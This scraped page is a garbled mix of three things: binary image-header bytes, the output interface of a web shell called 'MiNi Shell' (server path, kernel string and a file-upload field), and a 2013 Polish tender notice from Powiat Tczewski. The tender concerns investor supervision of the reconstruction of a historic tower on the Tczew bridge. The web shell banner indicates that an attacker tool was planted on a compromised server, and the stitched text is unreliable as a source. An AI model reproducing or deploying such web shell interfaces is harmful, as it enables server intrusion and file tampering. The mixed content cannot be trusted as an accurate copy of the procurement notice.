JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130619/234774-N-2013.html

<p class="kh_header"><b>Tczew: NADZÓR INWESTORSKI PRZY ROBOTACH BUDOWLANYCH ZWIĄZANYCH Z REALIZACJĄ ZADANIA INWESTYCYJNEGO PN. ODBUDOWA ZABYTKOWEJ CZĘŚCI MOSTU TCZEWSKIEGO - ETAP II (WIEŻA NR 1)</b><br>
<b>Numer ogłoszenia: 234774 - 2013; data zamieszczenia: 19.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tczewski , ul. Piaskowa 2, 83-110 Tczew, woj. pomorskie, tel. 58 7734 800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.tczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NADZÓR INWESTORSKI PRZY ROBOTACH BUDOWLANYCH ZWIĄZANYCH Z REALIZACJĄ ZADANIA INWESTYCYJNEGO PN. ODBUDOWA ZABYTKOWEJ CZĘŚCI MOSTU TCZEWSKIEGO - ETAP II (WIEŻA NR 1).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Przedmiotem postępowania jest nadzór inwestorski przy robotach budowlanych związanych z realizacją zadania inwestycyjnego pn. Odbudowa zabytkowej części Mostu Tczewskiego - etap II (wieża nr 1).
2.3 Adres obiektu, na którym prowadzone będą nadzorowane roboty budowlane - most drogowy na rzece Wiśle, łączący miejscowości: Tczew i Lisewo, będący od strony Tczewa przedłużeniem ulicy Jana z Kolna; działka nr 188, obręb 7: Tczew. 
Nadzór nad robotami dotyczy zabytkowej wieży nr 1 (bez filara, na którym jest ona posadowiona oraz łącznika między wieżami nr 1 i 2), umiejscowionej po stronie północnej Mostu, w kierunku miejscowości Tczew.
2.4 Szczegółowy zakres nadzorowanych robót określa dokumentacja projektowa, składająca się z następujących pozycji:
2.4.1 Nazwa: Umowa nr PZD/273.26.2011/9914 Poz. PB Projekt Budowlano-Wykonawczy, składający się z dwóch części:
1) Branża: Architektura i Konstrukcja 
- Nazwa opracowania: PROJEKT ARCHITEKTONICZNO - BUDOWLANY,
- Przedsięwzięcie: Wykonanie remontu zabytkowych wież mostu przez rzekę Wisłę w Tczewie w ciągu ulicy Jana z Kolna,
- Zamawiający: Powiatowy Zarząd Dróg w Tczewie, ul. Armii Krajowej 84, 83-110 Tczew,
- Numery ewidencyjne działek: Dz. nr 188 obręb 7: Tczew,
- Projektant: mgr inż. arch. Anna Smółko, inż. Waldemar Stawicki,
- Sprawdzający: mgr inż. arch. Sławomir Bryczkowski, inż. Roman Witczak
- Inżynier Projektu: mgr inż. Mariusz Sobczyk,
- Gdańsk, grudzień 2011 r.
zawierający PROJEKT BUDOWLANO - WYKONAWCZY; 
2) część Branża: Elektroenergetyka 
- Nazwa opracowania: PROJEKT INSTALACJI ODGROMOWEJ,
- Przedsięwzięcie: Wykonanie remontu zabytkowych wież mostu przez rzekę Wisłę w Tczewie,
- Zamawiający: Powiatowy Zarząd Dróg w Tczewie, ul. Armii Krajowej 84, 83-110 Tczew,
- Numery ewidencyjne działek: Dz. nr 188 obręb 7: Tczew,
- Projektant: mgr inż. Piotr Burkhardt,
- Sprawdzający: mgr inż. Paweł Irek,
- Inżynier Projektu: mgr inż. Mariusz Sobczyk,
- Gdańsk, grudzień 2011 r.
2.4.2 Nazwa: Umowa nr PZD/273.26.2011/9914 Poz. PB/PW  Program Prac Konserwatorskich:
- Branża: Architektura i Konstrukcja,
- Nazwa opracowania: PROGRAM PRAC KONSERWATORSKICH,
- Przedsięwzięcie: Wykonanie remontu zabytkowych wież mostu przez rzekę Wisłę w Tczewie,
- Zamawiający: Powiatowy Zarząd Dróg w Tczewie, ul. Armii Krajowej 84, 83-110 Tczew,
- Numery ewidencyjne działek: Dz. nr 188 obręb 7: Tczew,
- Program opracował: mgr inż. Hubert Matulewicz,
- Opracowanie konstrukcyjne: mgr inż. Waldemar Stawicki,
- Opracowanie architektoniczne: mgr inż. Maciej Sas,
- Gdańsk, styczeń 2012 r.
2.4.3 SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH:
- Wykonanie remontu zabytkowych wież Mostu przez rzekę Wisłę w Tczewie w ciągu ulicy Jana z Kolna,
- ROBOTY BUDOWLANE,
- Opracował zespół: mgr inż. A. Brzeski, inż. M. Niedbalska, mgr inż. P. Chamski,
- Gdańsk, 2012 r. 
2.4.4 Nazwa: Umowa nr PZD/273.26.2011/9914 Poz. PB/PW  PRZEDMIAR ROBÓT:
- Branża: Wielobranżowa,
- Przedsięwzięcie: Wykonanie remontu zabytkowych baszt mostu przez rzekę Wisłę w Tczewie,
- Zamawiający: Powiatowy Zarząd Dróg w Tczewie, ul. Armii Krajowej 84, 83-110 Tczew,
- Autor opracowania: tech. Jacenty Masewicz,
- Sprawdzający: tech. Bogdan Orwat,
- Gdańsk, marzec 2012 r.
UWAGI  DO  DOKUMENTACJI:
1) Kopia wpisu wybranych elementów Mostu do rejestru zabytków Wojewódzkiego Konserwatora Zabytków w Gdańsku oraz kopia sprostowania tego zapisu w rejestrze, stanowią Załącznik do SIWZ.
2) Ww. dokumentacja projektowa obejmuje swoim zakresem wykonanie robót budowlanych dotyczących dwóch filarów Mostu (filara nr 5 i filara nr 6) oraz czterech zabytkowych wież posadowionych na tych filarach.
Niniejszy przetarg dotyczy nadzoru inwestorskiego nad robotami budowlanymi obejmującymi jedną wieżę: nr 1, z wyłączeniem: 
- filara, na którym jest posadowiona wieża,
- łącznika pomiędzy wieżami nr: 1 i 2.
W roku 2012 Zamawiający wykonał kompleksowy remont wieży nr 3, obecnie prowadzi roboty budowlane dotyczące wież nr: 2 i 4, natomiast roboty budowlane dotyczące obu filarów oraz łącznika między wieżami nr: 1 i 2 planuje wykonać w następnych etapach. 
3) Istnieją rozbieżności w numeracji filarów i wież posadowionych na odpowiednich filarach, a mianowicie:
a) w decyzji o wpisie do rejestru zabytków filar, na którym posadowione są wieże nr 3 i 4, posiada numer 6, a w dokumentacji projektowej ten sam filar ma numer 5. Rozbieżności te wynikają z faktu, iż sprostowanie decyzji o wpisie zabytku do rejestru zostało dokonane po wykonaniu i odebraniu dokumentacji projektowej.
b) w Programie Prac Konserwatorskich wieża nr 3 wrysowana jest od strony południowej filara nr 5 a wieża nr 4 od strony północnej. W projekcie Budowlano-Wykonawczym numeracja ta jest odwrotna. Do realizacji robót budowlanych obowiązuje numeracja - jak w projekcie Budowlano-Wykonawczym. 
4) Załączony przedmiar pełni funkcję wyłącznie pomocniczą dla Wykonawcy robót budowlanych, i zadaniem Wykonawcy robót budowlanych (które będą nadzorowane przez Wykonawcę, wyłonionego w niniejszym przetargu) będzie wykonanie pełnego zakresu robót budowlanych zawartych we wszystkich  projektach (dla wszystkich branż), zarówno przedstawionych w formie rysunków, jak i w części opisowej tych projektów. Należy to rozumieć w taki sposób, że jeśli nawet jakaś uwaga zawierająca polecenie wykonania określonego zakresu robót budowlanych została zapisana w części opisowej projektu a nie ma odzwierciedlenia na rysunku, bądź w przedmiarze robót - to obowiązkiem Wykonawcy będzie jej wykonanie.
2.5 Zaleca się dokonanie wizji lokalnej w miejscu planowanych robót budowlanych dla prawidłowego przygotowania oferty i realizacji zamówienia.
2.6 Zakres podstawowych obowiązków i praw inspektora nadzoru inwestorskiego określa art. 25 i art. 26 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tj. Dz. U. z 2010 r., Nr 243, poz.1623 ze zm.).
2.7 W ramach niniejszego zamówienia Inspektor Nadzoru zobowiązuje się do:
2.7.1 Reprezentowania Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności realizacji robót z Dokumentacją Projektową, Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych, przepisami prawa, w tym m.in. przepisami techniczno-wykonawczymi, w zakresie BHP i normami oraz zasadami wiedzy technicznej;
2.7.2 Sprawdzania jakości wykonywanych robót, wbudowanych wyrobów budowlanych, a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania w budownictwie, kontroli i archiwizacji dokumentów potwierdzających dopuszczenie tych materiałów do obrotu;
2.7.3 Zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami umowy zawartej z wykonawcą robót i dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, dla wszystkich asortymentów robót;
2.7.4 Podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) materiałów, prefabrykatów, betonów, sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o przepisy prawa, normy i wymagania sformułowane    w umowie z wykonawcą robót, w dokumentacji projektowej oraz Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych;
2.7.5 Sprawdzania i odbioru  robót budowlanych ulegających zakryciu lub zanikających, uczestniczenia w próbach i odbiorach technicznych sieci i urządzeń technicznych;
2.7.6 Potwierdzania faktycznie wykonanych robót oraz usunięcia wad;
2.7.7 Przygotowania do odbioru końcowego i dokonania odbioru końcowego inwestycji.
2.7.8 Sprawdzenia i zatwierdzenia dokumentacji powykonawczej.
2.7.9 Wydawania kierownikowi budowy lub kierownikom robót poleceń potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych;
2.7.10 Żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę;
2.7.11 Bieżącej kontroli ilości i terminowości wykonywanych robót oraz podejmowania działań w celu dotrzymania terminu realizacji inwestycji;
2.7.12 Nadzorowania budowy w takich odstępach czasu, aby była zapewniona skuteczność nadzoru, jednak nie rzadziej niż min. 1 raz w tygodniu oraz na każde żądanie Zamawiającego, w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora nadzoru będzie nieodzowna najpóźniej w następnym dniu od powiadomienia pisemnego lub ustnego. 
Każdorazowy pobyt na placu budowy winien być potwierdzony wpisem do dziennika budowy; 
2.7.13 Kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;
2.7.14 Sprawdzenia dokumentów załączonych do rozliczenia robót budowlanych;
2.7.15 Współpracy z projektantem, w tym do egzekwowania usunięcia ewentualnych usterek/wad w dokumentacji projektowej;
2.7.16 Współpracy z nadzorem konserwatorskim w celu zapewnienia m.in. wbudowania materiałów akceptowanych przez służby konserwatorskie (np. Wojewódzki Urząd konserwatora Zabytków) oraz stosowania odpowiednich technologii robót budowlanych.
2.7.17 Przygotowania do odbiorów (przeglądów) w okresie gwarancji jakości i rękojmi za wady inwestycji oraz odbiór (przegląd) w okresie gwarancji jakości i rękojmi za wady inwestycji.
2.8 Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających.
UWAGA - Zamawiający informuje, że w przetargu na roboty budowlane pn. Wykonanie robót budowlanych w celu realizacji zadania inwestycyjnego pn. Odbudowa zabytkowej części Mostu Tczewskiego (znak sprawy: ZP.272.14.2013), które będą nadzorowane w ramach niniejszego postępowania, przewidział możliwość udzielenia zamówień uzupełniających na roboty budowlane w branżach: ogólnobudowlanej i elektrycznej oraz w zakresie robót renowacyjnych i konserwatorskich, w trybie art. 67 ust. 1 pkt 6 ustawy Pzp.
W przypadku udzielenia Wykonawcy robót budowlanych zamówienia uzupełniającego, wybrany w niniejszym postępowaniu Wykonawca nadzoru inwestorskiego będzie sprawować nadzór nad robotami w ramach zamówienia uzupełniającego bez dodatkowego wynagrodzenia (w ramach wynagrodzenia podstawowego).
2.9 W przypadku zatrudnienia podwykonawców, Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego i osób trzecich za działania i zaniechania podwykonawców, jak również za jakość wykonanych przez nich usług..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w tym postępowaniu nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.3 Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:
4.3.1 wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (a w przypadku świadczeń okresowych lub ciągłych również wykonywane) główne usługi. 
Przez główne usługi Zamawiający rozumie wykonanie zamówienia/zamówień polegającego/ych na:
a) usłudze nadzoru inwestorskiego nad co najmniej 2 robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru zabytków, o wartości nadzorowanej roboty minimum 100 000,00 zł brutto każda,
lub
b) usłudze nadzoru inwestorskiego nad co najmniej 1 robotą budowlaną przy zabytku nieruchomym wpisanym do rejestru zabytków, o wartości nadzorowanej roboty minimum 500 000,00 zł brutto;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.3 Zamawiający oceni, czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:
4.3.2 dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług i kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnymi do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, a mianowicie:
a) 1 osobą na stanowisku Koordynatora Zespołu Inspektorów Nadzoru Inwestorskiego w specjalności (branży) konstrukcyjno - budowlanej, posiadającej:
- stosowne uprawnienia/dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzór inwestorski w specjalności (branży) konstrukcyjno - budowlanej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa (w szczególności zgodnie z ustawą Prawo budowlane - Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.),
- co najmniej 2 lata doświadczenia zawodowego nad realizacją robót budowlanych przy zabytkach nieruchomych wpisanych do rejestru zabytków.
UWAGA - Zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych oraz na podstawie art. 37 ust. 1 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U. Nr 162, poz. 1568, z późn. zm.) osoba wykonująca nadzór inwestorski, oprócz spełniania wymogów określonych     w ustawie Prawo Budowlane będzie musiała udokumentować odbytą, co najmniej 2 - letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków. Spełnienie tych wymagań będzie weryfikowane przez Wojewódzki Urząd Ochrony Zabytków w Gdańsku. 
Nie uzyskanie akceptacji Wojewódzkiego Urzędu Ochrony Zabytków w Gdańsku osoby wskazanej przez Wykonawcę będzie skutkować koniecznością jej zmiany (Wykonawca będzie miał obowiązek przedstawić inną osobę wraz z odpowiednimi uprawnieniami w ciągu 2 dni roboczych od daty powiadomienia go o tym fakcie). 
W przypadku braku akceptacji kolejnej osoby przez Wojewódzki Urząd Ochrony Zabytków w Gdańsku, Zamawiający zmuszony będzie odrzucić ofertę Wykonawcy.
b) 1 osobą na stanowisku inspektora nadzoru inwestorskiego w specjalności (branży) elektrycznej, posiadającej:
- stosowne uprawnienia/dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej nadzór inwestorski w specjalności (branży) elektrycznej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 1 rok doświadczenia zawodowego w specjalności (branży) elektrycznej na stanowisku inspektora nadzoru inwestorskiego, kierownika robót lub kierownika budowy przy realizacji robót budowlanych. 
UWAGA: Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające mu kwalifikacje zawodowe/dokumenty uprawniające do wykonywania samodzielnych funkcji technicznych w budownictwie/wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, z zastrzeżeniem art. 12a i innych przepisów ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2010 r., nr 243, poz. 1623 ze zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga od Wykonawcy wskazania w wykazie (sporządzonym według wzoru stanowiącego Załącznik Nr 1D do SIWZ) wykonanie:
a) usług nadzoru inwestorskiego nad co najmniej 2 robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru zabytków, o wartości nadzorowanej roboty minimum 100 000,00 zł brutto każda,
lub
b) usłudze nadzoru inwestorskiego nad co najmniej 1 robotą budowlaną przy zabytku nieruchomym wpisanym do rejestru zabytków, o wartości nadzorowanej roboty minimum 500 000,00 zł brutto;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
